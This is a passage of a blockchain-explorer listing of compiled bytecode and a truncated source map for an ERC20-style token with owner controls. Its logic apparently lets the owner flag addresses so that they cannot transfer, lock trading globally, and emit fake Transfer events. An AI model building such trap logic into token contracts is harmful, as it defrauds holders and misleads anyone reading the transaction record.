ff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610d2f90611959565b915050610c9e565b505050565b610d44610dba565b73ffffffffffffffffffffffffffffffffffffffff16610d62610872565b73ffffffffffffffffffffffffffffffffffffffff1614610db8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610daf90611b96565b60405180910390fd5b565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2690611c24565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9490611cb2565b60405180910390fd5b8060055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f7791906117d1565b60405180910390a3505050565b5f610f8f8484610ae8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110095781811015610ffb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff290611d1a565b60405180910390fd5b6110088484848403610dc1565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361107d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107490611da8565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e290611e36565b60405180910390fd5b6110f683838361155c565b5f60045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561117a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117190611ec4565b60405180910390fd5b81810360045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806112a3575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b806112ba5750600760019054906101000a900460ff165b15611315576001151560075f9054906101000a900460ff16151514611314576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130b90611f05565b60405180910390fd5b5b60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156113ba57600160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611425576001600760016101000a81548160ff0219169083151502179055505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161148291906117d1565b60405180910390a3611495848484611561565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261158f5761158e61156e565b5b8235905067ffffffffffffffff8111156115ac576115ab611572565b5b6020830191508360208202830111156115c8576115c7611576565b5b9250929050565b5f80602083850312156115e5576115e4611566565b5b5f83013567ffffffffffffffff8111156116025761160161156a565b5b61160e8582860161157a565b92509250509250929050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015611651578082015181840152602081019050611636565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6116768261161a565b6116808185611624565b9350611690818560208601611634565b6116998161165c565b840191505092915050565b5f6020820190508181035f8301526116bc818461166c565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6116ed826116c4565b9050919050565b6116fd816116e3565b8114611707575f80fd5b50565b5f81359050611718816116f4565b92915050565b5f819050919050565b6117308161171e565b811461173a575f80fd5b50565b5f8135905061174b81611727565b92915050565b5f806040838503121561176757611766611566565b5b5f6117748582860161170a565b92505060206117858582860161173d565b9150509250929050565b5f8115159050919050565b6117a38161178f565b82525050565b5f6020820190506117bc5f83018461179a565b92915050565b6117cb8161171e565b82525050565b5f6020820190506117e45f8301846117c2565b92915050565b5f805f6060848603121561180157611800611566565b5b5f61180e8682870161170a565b935050602061181f8682870161170a565b92505060406118308682870161173d565b9150509250925092565b5f60ff82169050919050565b61184f8161183a565b82525050565b5f6020820190506118685f830184611846565b92915050565b5f6020828403121561188357611882611566565b5b5f6118908482850161170a565b91505092915050565b6118a2816116e3565b82525050565b5f6020820190506118bb5f830184611899565b92915050565b5f80604083850312156118d7576118d6611566565b5b5f6118e48582860161170a565b92505060206118f58582860161170a565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6119638261171e565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036119955761199461192c565b5b600182019050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806119e457607f821691505b6020821081036119f7576119f66119a0565b5b50919050565b5f611a078261171e565b9150611a128361171e565b9250828201905080821115611a2a57611a2961192c565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611a8a602583611624565b9150611a9582611a30565b604082019050919050565b5f6020820190508181035f830152611ab781611a7e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611b18602683611624565b9150611b2382611abe565b604082019050919050565b5f6020820190508181035f830152611b4581611b0c565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611b80602083611624565b9150611b8b82611b4c565b602082019050919050565b5f6020820190508181035f830152611bad81611b74565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611c0e602483611624565b9150611c1982611bb4565b604082019050919050565b5f6020820190508181035f830152611c3b81611c02565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611c9c602283611624565b9150611ca782611c42565b604082019050919050565b5f6020820190508181035f830152611cc981611c90565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611d04601d83611624565b9150611d0f82611cd0565b602082019050919050565b5f6020820190508181035f830152611d3181611cf8565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611d92602583611624565b9150611d9d82611d38565b604082019050919050565b5f6020820190508181035f830152611dbf81611d86565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611e20602383611624565b9150611e2b82611dc6565b604082019050919050565b5f6020820190508181035f830152611e4d81611e14565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611eae602683611624565b9150611eb982611e54565b604082019050919050565b5f6020820190508181035f830152611edb81611ea2565b9050919050565b50565b5f611ef05f83611624565b9150611efb82611ee2565b5f82019050919050565b5f6020820190508181035f830152611f1c81611ee5565b905091905056fea2646970667358221220672777c73d5579723e5b0207de642f81eb2fed2c6f043b97cc1dbab8a3d9583064736f6c63430008140033
Deployed Bytecode
0x608060405234801561000f575f80fd5b5060043610610156575f3560e01c8063715018a6116100c1578063beabacc81161007a578063beabacc8146103c6578063d150475d146103e2578063dd62ed3e146103fe578063f2fde38b1461042e578063f3c30ceb1461044a578063f5ff800f1461046657610156565b8063715018a6146103025780638da5cb5b1461030c57806395d89b411461032a578063a457c2d714610348578063a9059cbb14610378578063b6d3f070146103a857610156565b8063313ce56711610113578063313ce5671461022e578063395093511461024c5780634682ac8c1461027c578063574733361461029857806367dfe427146102a257806370a08231146102d257610156565b806301c9bf5a1461015a57806306fdde0314610176578063095ea7b31461019457806318160ddd146101c45780631afdfa9b146101e257806323b872dd146101fe575b5f80fd5b610174600480360381019061016f91906115cf565b610482565b005b61017e61052a565b60405161018b91906116a4565b60405180910390f35b6101ae60048036038101906101a99190611751565b6105ba565b6040516101bb91906117a9565b60405180910390f35b6101cc6105dc565b6040516101d991906117d1565b60405180910390f35b6101fc60048036038101906101f791906115cf565b6105e5565b005b610218600480360381019061021391906117ea565b61068e565b60405161022591906117a9565b60405180910390f35b6102366106bc565b6040516102439190611855565b60405180910390f35b61026660048036038101906102619190611751565b6106c4565b60405161027391906117a9565b60405180910390f35b610296600480360381019061029191906115cf565b6106fa565b005b6102a06107a3565b005b6102bc60048036038101906102b7919061186e565b6107c7565b6040516102c991906117a9565b60405180910390f35b6102ec60048036038101906102e7919061186e565b610819565b6040516102f991906117d1565b60405180910390f35b61030a61085f565b005b610314610872565b60405161032191906118a8565b60405180910390f35b610332610899565b60405161033f91906116a4565b60405180910390f35b610362600480360381019061035d9190611751565b610929565b60405161036f91906117a9565b60405180910390f35b610392600480360381019061038d9190611751565b61099e565b60405161039f91906117a9565b60405180910390f35b6103b06109c0565b6040516103bd91906117a9565b60405180910390f35b6103e060048036038101906103db91906117ea565b6109d6565b005b6103fc60048036038101906103f791906115cf565b610a40565b005b610418600480360381019061041391906118c1565b610ae8565b60405161042591906117d1565b60405180910390f35b6104486004803603810190610443919061186e565b610b6a565b005b610464600480360381019061045f91906115cf565b610bec565b005b610480600480360381019061047b91906115cf565b610c94565b005b61048a610d3c565b5f5b82829050811015610525575f60025f8585858181106104ae576104ad6118ff565b5b90506020020160208101906104c3919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061051d90611959565b91505061048c565b505050565b606060088054610539906119cd565b80601f0160208091040260200160405190810160405280929190818152602001828054610565906119cd565b80156105b05780601f10610587576101008083540402835291602001916105b0565b820191905f5260205f20905b81548152906001019060200180831161059357829003601f168201915b5050505050905090565b5f806105c4610dba565b90506105d1818585610dc1565b600191505092915050565b5f600654905090565b6105ed610d3c565b5f5b8282905081101561068957600160035f858585818110610612576106116118ff565b5b9050602002016020810190610627919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061068190611959565b9150506105ef565b505050565b5f80610698610dba565b90506106a5858285610f84565b6106b085858561100f565b60019150509392505050565b5f6012905090565b5f806106ce610dba565b90506106ef8185856106e08589610ae8565b6106ea91906119fd565b610dc1565b600191505092915050565b610702610d3c565b5f5b8282905081101561079e57600160025f858585818110610727576107266118ff565b5b905060200201602081019061073c919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061079690611959565b915050610704565b505050565b6107ab610d3c565b5f600760016101000a81548160ff021916908315150217905550565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610867610d3c565b6108705f61149b565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600980546108a8906119cd565b80601f01602080910402602001604051908101604052809291908181526020018280546108d4906119cd565b801561091f5780601f106108f65761010080835404028352916020019161091f565b820191905f5260205f20905b81548152906001019060200180831161090257829003601f168201915b5050505050905090565b5f80610933610dba565b90505f6109408286610ae8565b905083811015610985576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161097c90611aa0565b60405180910390fd5b6109928286868403610dc1565b60019250505092915050565b5f806109a8610dba565b90506109b581858561100f565b600191505092915050565b5f600760019054906101000a900460ff16905090565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a3391906117d1565b60405180910390a3505050565b610a48610d3c565b5f5b82829050811015610ae3575f60035f858585818110610a6c57610a6b6118ff565b5b9050602002016020810190610a81919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610adb90611959565b915050610a4a565b505050565b5f60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610b72610d3c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610be0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd790611b2e565b60405180910390fd5b610be98161149b565b50565b610bf4610d3c565b5f5b82829050811015610c8f576001805f858585818110610c1857610c176118ff565b5b9050602002016020810190610c2d919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610c8790611959565b915050610bf6565b505050565b610c9c610d3c565b5f5b82829050811015610d37575f60015f858585818110610cc057610cbf6118ff565b5b9050602002016020810190610cd5919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610d2f90611959565b915050610c9e565b505050565b610d44610dba565b73ffffffffffffffffffffffffffffffffffffffff16610d62610872565b73ffffffffffffffffffffffffffffffffffffffff1614610db8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610daf90611b96565b60405180910390fd5b565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2690611c24565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9490611cb2565b60405180910390fd5b8060055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f7791906117d1565b60405180910390a3505050565b5f610f8f8484610ae8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110095781811015610ffb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff290611d1a565b60405180910390fd5b6110088484848403610dc1565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361107d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107490611da8565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e290611e36565b60405180910390fd5b6110f683838361155c565b5f60045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561117a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117190611ec4565b60405180910390fd5b81810360045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806112a3575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b806112ba5750600760019054906101000a900460ff165b15611315576001151560075f9054906101000a900460ff16151514611314576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130b90611f05565b60405180910390fd5b5b60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156113ba57600160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611425576001600760016101000a81548160ff0219169083151502179055505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161148291906117d1565b60405180910390a3611495848484611561565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261158f5761158e61156e565b5b8235905067ffffffffffffffff8111156115ac576115ab611572565b5b6020830191508360208202830111156115c8576115c7611576565b5b9250929050565b5f80602083850312156115e5576115e4611566565b5b5f83013567ffffffffffffffff8111156116025761160161156a565b5b61160e8582860161157a565b92509250509250929050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015611651578082015181840152602081019050611636565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6116768261161a565b6116808185611624565b9350611690818560208601611634565b6116998161165c565b840191505092915050565b5f6020820190508181035f8301526116bc818461166c565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6116ed826116c4565b9050919050565b6116fd816116e3565b8114611707575f80fd5b50565b5f81359050611718816116f4565b92915050565b5f819050919050565b6117308161171e565b811461173a575f80fd5b50565b5f8135905061174b81611727565b92915050565b5f806040838503121561176757611766611566565b5b5f6117748582860161170a565b92505060206117858582860161173d565b9150509250929050565b5f8115159050919050565b6117a38161178f565b82525050565b5f6020820190506117bc5f83018461179a565b92915050565b6117cb8161171e565b82525050565b5f6020820190506117e45f8301846117c2565b92915050565b5f805f6060848603121561180157611800611566565b5b5f61180e8682870161170a565b935050602061181f8682870161170a565b92505060406118308682870161173d565b9150509250925092565b5f60ff82169050919050565b61184f8161183a565b82525050565b5f6020820190506118685f830184611846565b92915050565b5f6020828403121561188357611882611566565b5b5f6118908482850161170a565b91505092915050565b6118a2816116e3565b82525050565b5f6020820190506118bb5f830184611899565b92915050565b5f80604083850312156118d7576118d6611566565b5b5f6118e48582860161170a565b92505060206118f58582860161170a565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6119638261171e565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036119955761199461192c565b5b600182019050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806119e457607f821691505b6020821081036119f7576119f66119a0565b5b50919050565b5f611a078261171e565b9150611a128361171e565b9250828201905080821115611a2a57611a2961192c565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611a8a602583611624565b9150611a9582611a30565b604082019050919050565b5f6020820190508181035f830152611ab781611a7e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611b18602683611624565b9150611b2382611abe565b604082019050919050565b5f6020820190508181035f830152611b4581611b0c565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611b80602083611624565b9150611b8b82611b4c565b602082019050919050565b5f6020820190508181035f830152611bad81611b74565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611c0e602483611624565b9150611c1982611bb4565b604082019050919050565b5f6020820190508181035f830152611c3b81611c02565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611c9c602283611624565b9150611ca782611c42565b604082019050919050565b5f6020820190508181035f830152611cc981611c90565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611d04601d83611624565b9150611d0f82611cd0565b602082019050919050565b5f6020820190508181035f830152611d3181611cf8565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611d92602583611624565b9150611d9d82611d38565b604082019050919050565b5f6020820190508181035f830152611dbf81611d86565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611e20602383611624565b9150611e2b82611dc6565b604082019050919050565b5f6020820190508181035f830152611e4d81611e14565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611eae602683611624565b9150611eb982611e54565b604082019050919050565b5f6020820190508181035f830152611edb81611ea2565b9050919050565b50565b5f611ef05f83611624565b9150611efb82611ee2565b5f82019050919050565b5f6020820190508181035f830152611f1c81611ee5565b905091905056fea2646970667358221220672777c73d5579723e5b0207de642f81eb2fed2c6f043b97cc1dbab8a3d9583064736f6c63430008140033
Deployed Bytecode Sourcemap
81:140:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4486:179:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2248:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6026:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4837:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3282:173;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6785:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3185:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7466:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4182:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4044:58;;;:::i;:::-;;4671:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5001:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;1834:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2459:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8187:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5322:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4108:68;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4363:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3461:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5569:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3644:192:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3842:196;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4486:179;1727:13:0;:11;:13::i;:::-;4569:9:1::1;4564:95;4588:6;;:13;;4584:1;:17;4564:95;;;4643:5;4622:7;:18;4630:6;;4637:1;4630:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;4622:18;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;4603:3;;;;;:::i;:::-;;;;4564:95;;;;4486:179:::0;;:::o;2248:98::-;2302:13;2334:5;2327:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2248:98;:::o;6026:197::-;6109:4;6125:13;6141:12;:10;:12::i;:::-;6125:28;;6163:32;6172:5;6179:7;6188:6;6163:8;:32::i;:::-;6212:4;6205:11;;;6026:197;;;;:::o;4837:106::-;4898:7;4924:12;;4917:19;;4837:106;:::o;3282:173::-;1727:13:0;:11;:13::i;:::-;3360:9:1::1;3355:94;3379:6;;:13;;3375:1;:17;3355:94;;;3434:4;3413:7;:18;3421:6;;3428:1;3421:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3413:18;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;3394:3;;;;;:::i;:::-;;;;3355:94;;;;3282:173:::0;;:::o;6785:286::-;6912:4;6928:15;6946:12;:10;:12::i;:::-;6928:30;;6968:38;6984:4;6990:7;6999:6;6968:15;:38::i;:::-;7016:27;7026:4;7032:2;7036:6;7016:9;:27::i;:::-;7060:4;7053:11;;;6785:286;;;;;:::o;3185:91::-;3243:5;3267:2;3260:9;;3185:91;:::o;7466:234::-;7554:4;7570:13;7586:12;:10;:12::i;:::-;7570:28;;7608:64;7617:5;7624:7;7661:10;7633:25;7643:5;7650:7;7633:9;:25::i;:::-;:38;;;;:::i;:::-;7608:8;:64::i;:::-;7689:4;7682:11;;;7466:234;;;;:::o;4182:175::-;1727:13:0;:11;:13::i;:::-;4262:9:1::1;4257:94;4281:6;;:13;;4277:1;:17;4257:94;;;4336:4;4315:7;:18;4323:6;;4330:1;4323:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;4315:18;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;4296:3;;;;;:::i;:::-;;;;4257:94;;;;4182:175:::0;;:::o;4044:58::-;1727:13:0;:11;:13::i;:::-;4094:5:1::1;4085:6;;:14;;;;;;;;;;;;;;;;;;4044:58::o:0;4671:106::-;4729:4;4752:7;:18;4760:9;4752:18;;;;;;;;;;;;;;;;;;;;;;;;;4745:25;;4671:106;;;:::o;5001:125::-;5075:7;5101:9;:18;5111:7;5101:18;;;;;;;;;;;;;;;;5094:25;;5001:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;1834:85::-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;2459:102:1:-;2515:13;2547:7;2540:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2459:102;:::o;8187:427::-;8280:4;8296:13;8312:12;:10;:12::i;:::-;8296:28;;8334:24;8361:25;8371:5;8378:7;8361:9;:25::i;:::-;8334:52;;8424:15;8404:16;:35;;8396:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;8515:60;8524:5;8531:7;8559:15;8540:16;:34;8515:8;:60::i;:::-;8603:4;8596:11;;;;8187:427;;;;:::o;5322:189::-;5401:4;5417:13;5433:12;:10;:12::i;:::-;5417:28;;5455;5465:5;5472:2;5476:6;5455:9;:28::i;:::-;5500:4;5493:11;;;5322:189;;;;:::o;4108:68::-;4152:4;4167:6;;;;;;;;;;;4160:13;;4108:68;:::o;4363:117::-;4463:3;4447:26;;4456:5;4447:26;;;4468:4;4447:26;;;;;;:::i;:::-;;;;;;;;4363:117;;;:::o;3461:177::-;1727